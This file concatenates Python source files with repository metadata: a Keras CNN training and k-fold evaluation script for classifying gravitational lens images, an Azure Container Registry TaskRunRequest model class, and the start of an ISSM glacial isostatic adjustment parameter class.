classifier.add(Dropout(0.2)) # antes era 0.25
# Step 3 - Flattening
classifier.add(Flatten())
# Step 4 - Full connection
classifier.add(Dropout(0.2))
classifier.add(Dense(units=1, activation='sigmoid'))
classifier.summary()
# Compiling the CNN
classifier.compile(optimizer=opt,
loss='binary_crossentropy',
metrics=['accuracy'])
plot_model(classifier, to_file='model_plot.png', show_shapes=True, show_layer_names=True)
return classifier
def visualiseActivations(img_tensor, base_dir):
"""
This makes images of the activations, as the selected image passed through the model
Args:
img_tensor(numpy array): This is the numpy array of the selected image
base_dir(string): This is the file path name
Saves:
This saves the activation images of the selected source.
"""
global predicted_class, size
# Run prediction on that image
predicted_class = classifier.predict_classes(img_tensor, batch_size=10)
print("Predicted class is: ", predicted_class)
# Visualize activations
layer_outputs = [layer.output for layer in classifier.layers[:12]]
activation_model = Model(inputs=classifier.input, outputs=layer_outputs)
activations = activation_model.predict(img_tensor)
layer_names = []
for layer in classifier.layers[:12]:
layer_names.append(layer.name)
images_per_row = 3
count = 0
for layer_name, layer_activation in zip(layer_names, activations):
number_of_features = layer_activation.shape[-1]
size = layer_activation.shape[1]
number_of_columns = number_of_features // images_per_row
display_grid = np.zeros((size * number_of_columns, images_per_row * size))
for col in range(number_of_columns):
for row in range(images_per_row):
channel_image = layer_activation[0, :, :, col * images_per_row + row]
channel_image -= channel_image.mean()
channel_image /= channel_image.std()
channel_image *= 64
channel_image += 128
channel_image = np.clip(channel_image, 0, 255).astype('uint8')
display_grid[col * size: (col + 1) * size, row * size: (row + 1) * size] = channel_image
scale = 1. / size
activations_figure = plt.figure(figsize=(scale * display_grid.shape[1],
scale * display_grid.shape[0]))
plt.title(layer_name)
plt.grid(False)
plt.imshow(display_grid, aspect='auto', cmap='viridis')
activations_figure.savefig('%s/%s_Activation_%s.png' % (base_dir, count, layer_name))
plt.close()
count += 1
def usingCnnModel(training_data, training_labels, val_data, val_labels):
"""
This is using the CNN model and setting it up.
Args:
training_data(numpy arrays): This is the numpy array of the training data.
training_labels(numpy arrays): This is the numpy array of the training labels.
val_data(numpy arrays): This is the numpy array of the validation data.
val_labels(numpy arrays): This is the numpy array of the validation labels.
Returns:
history(history): This is the history of the classifier.
classifier(sequential): This is the cnn model classifier fitted to the training data and labels.
"""
model_checkpoint = ModelCheckpoint(filepath="best_weights.hdf5",
monitor=monitor_model_checkpoint,
save_best_only=True)
early_stopping = EarlyStopping(monitor=monitor_early_stopping, patience=patience_num) # original patience =3
classifier = buildClassifier()
callbacks_array = []
if use_early_stopping:
callbacks_array.append(early_stopping)
if use_model_checkpoint:
callbacks_array.append(model_checkpoint)
print(len(training_data))
history = classifier.fit(training_data,
training_labels,
epochs=epochs,
validation_data=(val_data, val_labels),
callbacks=callbacks_array,
batch_size=batch_size
# steps_per_epoch=int(len(training_data) / batch_size),
)
return history, classifier
def createAugmentedData(training_data, training_labels):
"""
This is creates the augmented data.
Args:
training_data(numpy arrays): This is the numpy array of the training data.
training_labels(numpy arrays): This is the numpy array of the training labels.
Returns:
complete_training_data_set(numpy array): This is the numpy array of the total training data, which is has
undergone augmentation.
complete_training_labels_set(numpy array): This is the numpy array of the total training labels, which is has
undergone augmentation.
"""
complete_training_data_set = []
complete_training_labels_set = []
for data in training_data:
complete_training_data_set.append(data)
print("Complete Training Data: " + str(len(complete_training_data_set)))
for label in training_labels:
complete_training_labels_set.append(label)
print("Complete Training Label: " + str(len(complete_training_labels_set)))
# create augmented data
data_augmented = ImageDataGenerator(featurewise_center=True,
featurewise_std_normalization=True,
rotation_range=90,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
vertical_flip=True)
# data_augmented = ImageDataGenerator(featurewise_center=False,
# featurewise_std_normalization=False,
# rotation_range=90,
# horizontal_flip=True,
# vertical_flip=True)
data_augmented.fit(training_data)
training_data_size = training_data.shape[0]
aug_counter = 0
while aug_counter < (augmented_multiple - 1):
iterator = data_augmented.flow(training_data, training_labels, batch_size=training_data_size)
# iterator = data_augmented.flow(training_data, training_labels, batch_size=batch_size)
augmented_data = iterator.next()
for data in augmented_data[0]:
complete_training_data_set.append(data)
for label in augmented_data[1]:
complete_training_labels_set.append(label)
aug_counter += 1
print("Size of All Training Data: " + str(len(complete_training_data_set)))
print("Size of All Training Labels: " + str(len(complete_training_labels_set)))
array_training_data = np.array(complete_training_data_set)
array_training_labels = np.array(complete_training_labels_set)
print("Shape of complete training data: " + str(array_training_data.shape))
print("Shape of complete training labels: " + str(array_training_labels.shape))
return np.array(complete_training_data_set), np.array(complete_training_labels_set)
def savePredictedLenses(des_names_array, predicted_class_probabilities, predicted_lenses_filepath, text_file_path):
"""
This saves the names of the predicted lenses in the respective textfiles.
Args:
des_names_array(numpy array): This is a list of the des names of the sources.
predicted_class_probabilities(list): This is a list of the probabilities in which lenses are predicted by
the algorithm.
predicted_lenses_filepath(string): This is the string of the predicted lenses filepath, where this needs
to be saved in the directory.
text_file_path(string): This is the text file path address to which these images are saved.
Saves:
text_file(.txt file): This is the text file saved containing the predicted lenses DES names.
"""
predicted_lenses = []
predicted_no_lenses = []
if not os.path.exists(predicted_lenses_filepath):
os.mkdir('%s/' % predicted_lenses_filepath)
text_file = open('%s' % text_file_path, "a+")
text_file.write('\n')
text_file.write('Predicted Lenses: \n')
for lens_index in range(len(predicted_class_probabilities)):
if predicted_class_probabilities[lens_index] == 1:
text_file.write("%s \n " % des_names_array[lens_index])
predicted_lenses.append(des_names_array[lens_index])
text_file.write('\n')
text_file.write('No Lenses Predicted: \n')
for lens_index in range(len(predicted_class_probabilities)):
if predicted_class_probabilities[lens_index] == 0:
text_file.write("%s \n " % des_names_array[lens_index])
predicted_no_lenses.append(des_names_array[lens_index])
text_file.close()
return predicted_lenses, predicted_no_lenses
def gettingTrueFalsePositiveNegatives(testing_data, testing_labels, text_file_path,
predicted_lenses_filepath, kf_counter=0):
"""
This is used to get the True/False Positive and Negative values gained from the CNN confusion matrix.
Args:
testing_data(numpy array): This is the unseen testing data numpy array.
testing_labels(numpy array): This is the unseen testing label numpy array.
text_file_path(string): This is the file path name of the text file in which the confusion
matrix is saved.
predicted_lenses_filepath(string): This is the file path in which the text file is saved.
Saves:
This saves a confusion matrix of the True/False Positive and Negative values.
"""
if not os.path.exists(predicted_lenses_filepath):
os.mkdir('%s/' % predicted_lenses_filepath)
predicted_data = classifier.predict_classes(testing_data)
rounded_predicted_data = predicted_data.round()
conf_matrix = confusion_matrix(testing_labels, rounded_predicted_data, labels=[0, 1])
print(str(conf_matrix) + ' \n ')
true_negative, false_positive, false_negative, true_positive = conf_matrix.ravel()
print("True Positive: %s \n" % true_positive)
print("False Negative: %s \n" % false_negative)
print("False Positive: %s \n" % false_positive)
print("True Negative: %s \n" % true_negative)
text_file = open('%s' % text_file_path, "a+")
text_file.write('\n')
text_file.write('KFold Number: %s \n' % str(kf_counter))
text_file.write('Predicted vs True Matrix: \n')
text_file.write(str(conf_matrix) + " \n ")
text_file.write("True Negative: %s \n" % str(true_negative))
text_file.write("False Positive: %s \n" % str(false_positive))
text_file.write("False Negative: %s \n" % str(false_negative))
text_file.write("True Positive: %s \n" % str(true_positive))
text_file.write("\n")
text_file.close()
confusion_matrix_array = [true_negative, false_positive, false_negative, true_positive]
return confusion_matrix_array
def gettingKFoldConfusionMatrix(test_data, test_labels, unseen_images, unseen_labels, select_known_images,
select_known_labels, kf_counter):
test_confusion_matrix = gettingTrueFalsePositiveNegatives(test_data,
test_labels,
text_file_path='../Results/%s/TrainingTestingResults'
'/KFold_PredictedMatrix.txt' % dt_string,
predicted_lenses_filepath='../Results/%s'
'/TrainingTestingResults '
% dt_string,
kf_counter=kf_counter)
unseen_confusion_matrix = gettingTrueFalsePositiveNegatives(unseen_images,
unseen_labels,
text_file_path='../Results/%s/UnseenKnownLenses/'
'KFold_LensesPredicted.txt' % dt_string,
predicted_lenses_filepath='../Results/%s'
'/UnseenKnownLenses/ '
% dt_string,
kf_counter=kf_counter)
select_confusion_matrix = gettingTrueFalsePositiveNegatives(select_known_images,
select_known_labels,
text_file_path='../Results/%s/UnseenKnownLensesSelect/'
'KFold_LensesPredicted.txt' % dt_string,
predicted_lenses_filepath='../Results/%s'
'/UnseenKnownLensesSelect/ '
% dt_string,
kf_counter=kf_counter)
return test_confusion_matrix, unseen_confusion_matrix, select_confusion_matrix
def gettingRandomUnseenImage(filepath):
g_img_path = get_pkg_data_filename('%s/g_norm.fits' % filepath)
r_img_path = get_pkg_data_filename('%s/r_norm.fits' % filepath)
i_img_path = get_pkg_data_filename('%s/i_norm.fits' % filepath)
g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
img_data = np.array([g_data, r_data, i_data]).reshape(input_shape[0], input_shape[1], input_shape[2])
return img_data
def executeKFoldValidation(train_data, train_labels, val_data, val_labels, testing_data, testing_labels,
known_images, known_labels, known_des_names,
select_known_images, select_known_labels):
"""
This does the k fold cross validation which is tested against the unseen testing and known lenses.
Args:
train_data(numpy arrays): This is the numpy array of the training data.
train_labels(numpy arrays): This is the numpy array of the training labels.
val_data(numpy arrays): This is the numpy array of the validation data.
val_labels(numpy arrays): This is the numpy array of the validation labels.
testing_data(numpy array): This is the numpy array of the unseen testing data.
testing_labels(numpy array): This is the numpy array of the unseen testing label.
images_47(numpy array): This is the numpy array of the unseen DES images data.
labels_47(numpy array): This is the numpy array of the unseen DES images labels.
images_84(numpy array): This is the numpy array of the unseen Jacobs images data.
labels_84(numpy array): This is the numpy array of the unseen Jacobs images labels.
all_unseen_images(numpy array): This is the numpy array of the unseen DES + Jacobs images data.
all_unseen_labels(numpy array): This is the numpy array of the unseen DES + Jacobs images labels.
Saves:
This saves the scores, mean and std. of the unseen data that is evaluated in the k fold cross validation.
"""
if run_k_fold_validation:
print("In executingKFoldValidation")
# this is doing it manually:
kfold = StratifiedKFold(n_splits=k_fold_num, shuffle=True)
test_scores_list = []
test_loss_list = []
unseen_scores_list = []
unseen_loss_list = []
select_unseen_scores_list = []
select_unseen_loss_list = []
test_matrix_list = []
unseen_matrix_list = []
select_matrix_list = []
kf_counter = 0
true_positives = {}
false_negatives = {}
for train, test in kfold.split(train_data, train_labels):
kf_counter += 1
print('KFold #:', kf_counter)
model = buildClassifier()
# fit the model
model.fit(train_data[train],
train_labels[train],
epochs=epochs,
validation_data=(val_data, val_labels),
batch_size=batch_size)
test_scores = model.evaluate(testing_data, testing_labels, batch_size=batch_size)
test_scores_list.append(test_scores[1])
test_loss_list.append(test_scores[0])
print("Test Score: " + str(test_scores_list))
print("Test Loss: " + str(test_loss_list))
unseen_scores = model.evaluate(known_images, known_labels, batch_size=batch_size)
unseen_scores_list.append(unseen_scores[1])
unseen_loss_list.append(unseen_scores[0])
print("Unseen Score: " + str(unseen_scores_list))
print("Unseen Loss: " + str(unseen_loss_list))
select_scores = model.evaluate(select_known_images, select_known_labels, batch_size=batch_size)
select_unseen_scores_list.append(select_scores[1])
select_unseen_loss_list.append(select_scores[0])
# show confusion matrix
test_confusion_matrix, unseen_confusion_matrix, select_confusion_matrix = gettingKFoldConfusionMatrix(
testing_data,
testing_labels, known_images,
known_labels, select_known_images, select_known_labels, kf_counter)
probabilities_known_lenses = classifier.predict_classes(known_images, batch_size=batch_size)
predicted_lens = np.count_nonzero(probabilities_known_lenses == 1)
predicted_no_lens = np.count_nonzero(probabilities_known_lenses == 0)
print("%s/%s known lenses predicted" % (predicted_lens, len(known_images)))
print("%s/%s non known lenses predicted" % (predicted_no_lens, len(known_images)))
predicted_lenses, predicted_no_lenses = savePredictedLenses(known_des_names,
predicted_class_probabilities_known_lenses,
text_file_path='../Results/%s'
'/UnseenKnownLenses/'
'KFold_LensesPredicted.txt'
% dt_string,
predicted_lenses_filepath='../Results/%s/'
'UnseenKnownLenses'
% dt_string)
randomTP = None
imageTP = None
if predicted_lenses:
randomTP = random.choice(predicted_lenses)
filepathTP = unseen_known_file_path_all + '/%s' % randomTP
imageTP = gettingRandomUnseenImage(filepathTP)
true_positives[kf_counter] = (randomTP, imageTP)
randomFN = None
imageFN = None
if predicted_no_lenses:
randomFN = random.choice(predicted_no_lenses)
filepathFN = unseen_known_file_path_all + '/%s' % randomFN
imageFN = gettingRandomUnseenImage(filepathFN)
false_negatives[kf_counter] = (randomFN, imageFN)
# print("Lenses Predicted: " + str(randomTP))
# print("Lenses Not Predicted: " + str(randomFN))
test_matrix_list.append(test_confusion_matrix)
unseen_matrix_list.append(unseen_confusion_matrix)
select_matrix_list.append(select_confusion_matrix)
test_scores_mean = np.mean(test_scores_list)
test_loss_mean = np.mean(test_loss_list)
test_scores_std = np.std(test_scores_list)
unseen_scores_mean = np.mean(unseen_scores_list)
unseen_loss_mean = np.mean(unseen_loss_list)
unseen_scores_std = np.std(unseen_scores_list)
select_scores_mean = np.mean(select_unseen_scores_list)
select_loss_mean = np.mean(select_unseen_loss_list)
select_scores_std = np.std(select_unseen_scores_list)
print("Test Confusion Matrices: " + str(test_matrix_list))
print("Test Scores: " + str(test_scores_list))
print("Test Scores Mean: " + str(test_scores_mean))
print("Test Scores Std: " + str(test_scores_std))
print("Test Loss: " + str(test_loss_list))
print("Test Loss Mean: " + str(test_loss_mean))
print("Unseen Confusion Matrices: " + str(unseen_matrix_list))
print("Unseen Scores: " + str(unseen_scores_list))
print("Unseen Scores Mean: " + str(unseen_scores_mean))
print("Unseen Scores Std: " + str(unseen_scores_std))
print("Unseen Loss: " + str(unseen_loss_list))
print("Unseen Loss Mean: " + str(unseen_loss_mean))
print("Select Confusion Matrices: " + str(select_matrix_list))
print("Select Score: " + str(select_unseen_scores_list))
print("Select Scores Mean: " + str(select_scores_mean))
print("Select Unseen Scores Std: " + str(select_scores_std))
print("Select Loss: " + str(select_unseen_loss_list))
print("Unseen Loss Mean: " + str(select_loss_mean))
excel_headers.append("Test Loss Mean")
excel_dictionary.append(test_loss_mean)
excel_headers.append("Test Scores Mean")
excel_dictionary.append(test_scores_mean)
excel_headers.append("Test Scores Std")
excel_dictionary.append(test_scores_std)
excel_headers.append("Unseen Loss Mean")
excel_dictionary.append(unseen_loss_mean)
excel_headers.append("Unseen Known Lenses Mean")
excel_dictionary.append(unseen_scores_mean)
excel_headers.append("Unseen Known Lenses Std")
excel_dictionary.append(unseen_scores_std)
excel_headers.append("Select Loss Mean")
excel_dictionary.append(select_loss_mean)
excel_headers.append("Select Scores Mean")
excel_dictionary.append(select_scores_mean)
excel_headers.append("Select Std")
excel_dictionary.append(select_scores_std)
plt.plot(test_scores_list, color='red', label='Testing Scores')
plt.plot(unseen_scores_list, color='blue', label='Unseen Known Lenses Scores')
plt.plot(select_unseen_scores_list, color='green', label="Selected Unseen Known Lenses Scores")
plt.xlabel('Folds')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
plt.savefig('../Results/%s/KFoldAccuracyScores.png' % dt_string)
plotKFold(true_positives, false_negatives)
def viewActivationLayers():
# make positive and negative directory
if not os.path.exists('../Results/%s/PositiveResults/' % dt_string):
os.mkdir('../Results/%s/PositiveResults/' % dt_string)
if not os.path.exists('../Results/%s/NegativeResults/' % dt_string):
os.mkdir('../Results/%s/NegativeResults/' % dt_string)
# Plot original positive image
img_positive_tensor = getPositiveImages('Training/PositiveAll', 1, input_shape=input_shape)
positive_train_figure = plt.figure()
plt.imshow(img_positive_tensor[0])
# plt.show()
print(img_positive_tensor.shape)
positive_train_figure.savefig('../Results/%s/PositiveResults/PositiveTrainingFigure.png' % dt_string)
plt.close()
# Visualise Activations of positive image
visualiseActivations(img_positive_tensor, base_dir='../Results/%s/PositiveResults/' % dt_string)
# Plot original negative image
img_negative_tensor = getNegativeImages('Training/Negative', 1, input_shape=input_shape)
negative_train_figure = plt.figure()
plt.imshow(img_negative_tensor[0])
# plt.show()
print(img_negative_tensor.shape)
negative_train_figure.savefig('../Results/%s/NegativeResults/NegativeTrainingFigure.png' % dt_string)
plt.close()
# Visualise Activations of negative image
visualiseActivations(img_negative_tensor, base_dir='../Results/%s/NegativeResults/' % dt_string)
def plotKFold(true_positives, false_negatives):
# print('True Positives: ' + str(true_positives))
# print('False Negatives: ' + str(false_negatives))
fig, axs = plt.subplots(k_fold_num, 2)
fig.tight_layout(pad=3.0)
cols = ['True Positive', 'False Negative']
for ax, col in zip(axs[0], cols):
ax.set_title(col)
# for ax, col in zip(axs[0], cols):
# for i in range(len(cols)):
# # axs[0, i].text(x=0.5, y=12, s="", ha="center", fontsize=12)
# # axs[k_fold_num - 1, i].set_xlabel(cols[i])
# axs[0, i].set_title(cols[i])
# # ax.set_title(col)
for i in range(0, k_fold_num):
axs[i, 0].text(x=-0.8, y=5, s="", rotation=90, va="center")
axs[i, 0].set_ylabel("k = %s" % (i + 1))
true_positive_tuple = true_positives[k_fold_num]
if not true_positive_tuple[0] is None:
axs[i, 0].set_xlabel(true_positive_tuple[0], fontsize=8)
# axs[i, 0].set_title(true_positive_tuple[0], fontsize=6)
axs[i, 0].imshow(true_positive_tuple[1])
axs[i, 0].set_xticks([], [])
axs[i, 0].set_yticks([], [])
false_negative_tuple = false_negatives[k_fold_num]
if not false_negative_tuple[0] is None:
axs[i, 1].set_xlabel(false_negative_tuple[0], fontsize=8)
# axs[i, 1].set_title(false_negative_tuple[0], fontsize=6)
axs[i, 1].imshow(false_negative_tuple[1])
axs[i, 1].set_xticks([], [])
axs[i, 1].set_yticks([], [])
fig.tight_layout()
plt.show()
fig.savefig('../Results/%s/UnseenKnownLenses/KFoldImages.png' % dt_string)
# __________________________________________________________________________
# MAIN
# Get positive training data
train_pos = getPositiveImages(images_dir=training_positive_path, max_num=max_num, input_shape=input_shape)
print("Train Positive Shape: " + str(train_pos.shape))
excel_headers.append("Train_Positive_Shape")
excel_dictionary.append(train_pos.shape)
# Get negative training data
train_neg = getNegativeImages(images_dir=training_negative_path, max_num=max_num, input_shape=input_shape)
print("Train Negative Shape: " + str(train_neg.shape))
excel_headers.append("Train_Negative_Shape")
excel_dictionary.append(train_neg.shape)
all_training_data, all_training_labels, _ = makeImageSet(train_pos, train_neg, shuffle_needed=use_shuffle)
if use_augmented_data:
all_training_data, all_training_labels = createAugmentedData(all_training_data, all_training_labels)
training_data, val_data, training_labels, val_labels = train_test_split(all_training_data,
all_training_labels,
test_size=validation_split,
shuffle=True)
excel_headers.append("All_Training_Data_Shape")
excel_dictionary.append(all_training_labels.shape)
excel_headers.append("All_Training_Labels_Shape")
excel_dictionary.append(all_training_labels.shape)
excel_headers.append("Training_Data_Shape")
excel_dictionary.append(training_data.shape)
excel_headers.append("Validation_Data_Shape")
excel_dictionary.append(val_data.shape)
excel_headers.append("Training_Labels_Shape")
excel_dictionary.append(training_labels.shape)
excel_headers.append("Validation_Labels_Shape")
excel_dictionary.append(val_labels.shape)
excel_headers.append("Validation_Split")
excel_dictionary.append(validation_split)
history, classifier = usingCnnModel(training_data,
training_labels,
val_data,
val_labels)
#classifier.load_weights('best_weights.hdf5')
#classifier.save_weights('galaxies_cnn.h5')
excel_headers.append("Epochs")
excel_dictionary.append(epochs)
excel_headers.append("Batch_size")
excel_dictionary.append(batch_size)
# Plot run metrics
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
number_of_completed_epochs = range(1, len(acc) + 1)
# Accuracies
train_val_accuracy_figure = plt.figure()
plt.plot(number_of_completed_epochs, acc, label='Training acc')
plt.plot(number_of_completed_epochs, val_acc, label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.xlabel("Epochs")
plt.ylabel("Accuracy")
plt.show()
train_val_accuracy_figure.savefig('../Results/%s/TrainingValidationAccuracy.png' % dt_string)
plt.close()
# Losses
train_val_loss_figure = plt.figure()
plt.plot(number_of_completed_epochs, loss, label='Training loss')
plt.plot(number_of_completed_epochs, val_loss, label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.show()
train_val_loss_figure.savefig('../Results/%s/TrainingValidationLoss.png' % dt_string)
plt.close()
# make positive and negative results and plotting the activations of positive and negative images
viewActivationLayers()
# Classifier evaluation
test_pos = getPositiveImages(images_dir=testing_positive_path, max_num=max_num_testing, input_shape=input_shape)
test_neg = getNegativeImages(images_dir=testing_negative_path, max_num=max_num_testing, input_shape=input_shape)
testing_data, testing_labels, _ = makeImageSet(test_pos, test_neg, shuffle_needed=True)
print("Testing Data Shape: " + str(testing_data.shape))
print("Testing Labels Shape: " + str(testing_labels.shape))
print("Got Unseen Testing data")
scores = classifier.evaluate(testing_data, testing_labels, batch_size=batch_size)
loss = scores[0]
accuracy = scores[1]
print("Test loss: %s" % loss)
print("Test accuracy: %s" % accuracy)
excel_headers.append("Test_Loss")
excel_dictionary.append(loss)
excel_headers.append("Test_Accuracy")
excel_dictionary.append(accuracy)
gettingTrueFalsePositiveNegatives(testing_data,
testing_labels,
text_file_path='../Results/%s/TrainingTestingResults/PredictedMatrixBeforeKFOLD.txt'
% dt_string,
predicted_lenses_filepath='../Results/%s/TrainingTestingResults' % dt_string)
unseen_known_images = getUnseenData(images_dir=unseen_known_file_path_all,
max_num=max_num_prediction,
input_shape=input_shape)
known_images, known_labels, known_des_names = makeImageSet(positive_images=list(unseen_known_images.values()),
tile_names=list(unseen_known_images.keys()),
shuffle_needed=True)
print("Unseen Known Images Shape: " + str(known_images.shape))
print("Unseen Known Labels Shape: " + str(known_labels.shape))
print("Got Unseen Known Lenses Data")
unseen_scores = classifier.evaluate(known_images, known_labels, batch_size=batch_size)
unseen_loss_score = unseen_scores[0]
unseen_accuracy_score = unseen_scores[1]
print("Unseen loss: %s" % unseen_loss_score)
print("Unseen accuracy: %s" % unseen_accuracy_score)
excel_headers.append("Unseen_Loss")
excel_dictionary.append(unseen_loss_score)
excel_headers.append("Unseen_Accuracy")
excel_dictionary.append(unseen_accuracy_score)
predicted_class_probabilities_known_lenses = classifier.predict_classes(known_images, batch_size=batch_size)
lens_predicted = np.count_nonzero(predicted_class_probabilities_known_lenses == 1)
non_lens_predicted = np.count_nonzero(predicted_class_probabilities_known_lenses == 0)
print("%s/%s known lenses predicted" % (lens_predicted, len(known_images)))
print("%s/%s non known lenses predicted" % (non_lens_predicted, len(known_images)))
gettingTrueFalsePositiveNegatives(known_images, known_labels,
text_file_path='../Results/%s/UnseenKnownLenses/PredictedMatrixBeforeKFOLD.txt' % dt_string,
predicted_lenses_filepath='../Results/%s/UnseenKnownLenses' % dt_string)
predicted_lenses, predicted_no_lenses = savePredictedLenses(known_des_names,
predicted_class_probabilities_known_lenses,
text_file_path='../Results/%s/UnseenKnownLenses/'
'PredictedMatrixBeforeKFOLD.txt' % dt_string,
predicted_lenses_filepath='../Results/%s/UnseenKnownLenses'
% dt_string)
######################################################################################
unseen_known_images_select = getUnseenData(images_dir=unseen_known_file_path_select,
max_num=max_num_prediction,
input_shape=input_shape)
select_known_images, select_known_labels, select_known_des_names = makeImageSet(
positive_images=list(unseen_known_images_select.values()),
tile_names=list(unseen_known_images_select.keys()),
shuffle_needed=True)
print("Unseen Selected Known Images Shape: " + str(select_known_images.shape))
print("Unseen Selected Known Labels Shape: " + str(select_known_labels.shape))
print("Got Unseen Selected Known Lenses Data")
select_unseen_scores = classifier.evaluate(select_known_images, select_known_labels, batch_size=batch_size)
select_unseen_loss_score = select_unseen_scores[0]
select_unseen_accuracy_score = select_unseen_scores[1]
print("Unseen Selected loss: %s" % select_unseen_loss_score)
print("Unseen Selected accuracy: %s" % select_unseen_accuracy_score)
excel_headers.append("Selected Unseen_Loss")
excel_dictionary.append(select_unseen_loss_score)
excel_headers.append("Select Unseen_Accuracy")
excel_dictionary.append(select_unseen_accuracy_score)
select_predicted_class_probabilities_known_lenses = classifier.predict_classes(select_known_images,
batch_size=batch_size)
select_lens_predicted = np.count_nonzero(select_predicted_class_probabilities_known_lenses == 1)
select_non_lens_predicted = np.count_nonzero(select_predicted_class_probabilities_known_lenses == 0)
print("%s/%s known lenses predicted" % (select_lens_predicted, len(select_known_images)))
print("%s/%s non known lenses predicted" % (select_non_lens_predicted, len(select_known_images)))
gettingTrueFalsePositiveNegatives(select_known_images, select_known_labels,
text_file_path='../Results/%s/UnseenKnownLensesSelect/PredictedMatrixBeforeKFOLD.txt' % dt_string,
predicted_lenses_filepath='../Results/%s/UnseenKnownLensesSelect' % dt_string)
select_predicted_lenses, select_predicted_no_lenses = savePredictedLenses(select_known_des_names,
select_predicted_class_probabilities_known_lenses,
text_file_path='../Results/%s'
'/UnseenKnownLensesSelect/ '
'PredictedMatrixBeforeKFOLD'
'.txt' % dt_string,
predicted_lenses_filepath='../Results/%s'
'/UnseenKnownLensesSelect'
% dt_string)
excel_headers.append("Selected Unseen_Known_Lenses_Predicted")
excel_dictionary.append(select_lens_predicted)
excel_headers.append("Selected Unseen_Known_Lenses_No_Lens_Predicted")
excel_dictionary.append(select_non_lens_predicted)
# K fold for training data
executeKFoldValidation(training_data,
training_labels,
val_data,
val_labels,
testing_data,
testing_labels,
known_images,
known_labels,
known_des_names,
select_known_images, select_known_labels)
if makeNewCSVFile:
createExcelSheet('../Results/Architecture_kerasCNN_Results.csv', excel_headers)
writeToFile('../Results/Architecture_kerasCNN_Results.csv', excel_dictionary)
else:
writeToFile('../Results/Architecture_kerasCNN_Results.csv', excel_dictionary)
|
[
"annarien.bester@gmail.com"
] |
annarien.bester@gmail.com
|
516e00001cc17c4e8ab48673154d9f69351bbfe1
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_run_request.py
|
2f2ed7a707c8b543f090be7f386215b7b75e10ce
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,824
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .run_request import RunRequest
class TaskRunRequest(RunRequest):
"""The parameters for a task run request.
All required parameters must be populated in order to send to Azure.
:param is_archive_enabled: The value that indicates whether archiving is
enabled for the run or not. Default value: False .
:type is_archive_enabled: bool
:param type: Required. Constant filled by server.
:type type: str
:param task_name: Required. The name of task against which run has to be
queued.
:type task_name: str
:param values: The collection of overridable values that can be passed
when running a task.
:type values:
list[~azure.mgmt.containerregistry.v2018_09_01.models.SetValue]
"""
_validation = {
'type': {'required': True},
'task_name': {'required': True},
}
_attribute_map = {
'is_archive_enabled': {'key': 'isArchiveEnabled', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'task_name': {'key': 'taskName', 'type': 'str'},
'values': {'key': 'values', 'type': '[SetValue]'},
}
def __init__(self, **kwargs):
super(TaskRunRequest, self).__init__(**kwargs)
self.task_name = kwargs.get('task_name', None)
self.values = kwargs.get('values', None)
self.type = 'TaskRunRequest'
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
26e5e03a43169c15a3fd647c4f0679d97ffa81ca
|
d80c7fe8288acfd02fa79e240183c418e522d1aa
|
/1-Basics/Test/Q3/Test.py
|
fe3ac9d72f23225da1bc1dff45214d3059d66be5
|
[] |
no_license
|
4ratkm88/COM404
|
82beeb84e7f6713a666038311e0d3e86d94ecc2e
|
5bf81d520ec44e19d15e2ee333c81542316c7833
|
refs/heads/master
| 2020-07-31T09:15:00.658014
| 2019-12-10T11:09:09
| 2019-12-10T11:09:09
| 210,556,814
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
print("How many zones must I cross?")
zone=int(input())
for zone in range(zone, 0, -1):
print("…crossed zone "+ str(zone))
print("Crossed all zones. Jumanji!")
|
[
"4ratkm88@solent.ac.uk"
] |
4ratkm88@solent.ac.uk
|
9f99434b0414a1ef779501b64fddd6cde711ca08
|
93022749a35320a0c5d6dad4db476b1e1795e318
|
/issm/giaivins.py
|
8b3e6e1be28e45ec640be9f57bc01bb251bc69f2
|
[
"BSD-3-Clause"
] |
permissive
|
pf4d/issm_python
|
78cd88e9ef525bc74e040c1484aaf02e46c97a5b
|
6bf36016cb0c55aee9bf3f7cf59694cc5ce77091
|
refs/heads/master
| 2022-01-17T16:20:20.257966
| 2019-07-10T17:46:31
| 2019-07-10T17:46:31
| 105,887,661
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,277
|
py
|
from issm.fielddisplay import fielddisplay
from issm.project3d import project3d
from issm.checkfield import checkfield
from issm.WriteData import WriteData
class giaivins(object):
"""
GIA class definition
Usage:
giaivins=giaivins();
"""
def __init__(self): # {{{
self.mantle_viscosity = float('NaN');
self.lithosphere_thickness = float('NaN');
self.cross_section_shape = 0;
#set defaults
self.setdefaultparameters()
#}}}
def __repr__(self): # {{{
string=' giaivins solution parameters:'
string="%s\n%s"%(string,fielddisplay(self,'mantle_viscosity','mantle viscosity constraints (NaN means no constraint) (Pa s)'))
string="%s\n%s"%(string,fielddisplay(self,'lithosphere_thickness','lithosphere thickness constraints (NaN means no constraint) (m)'))
string="%s\n%s"%(string,fielddisplay(self,'cross_section_shape',"1: square-edged, 2: elliptical-edged surface"))
return string
#}}}
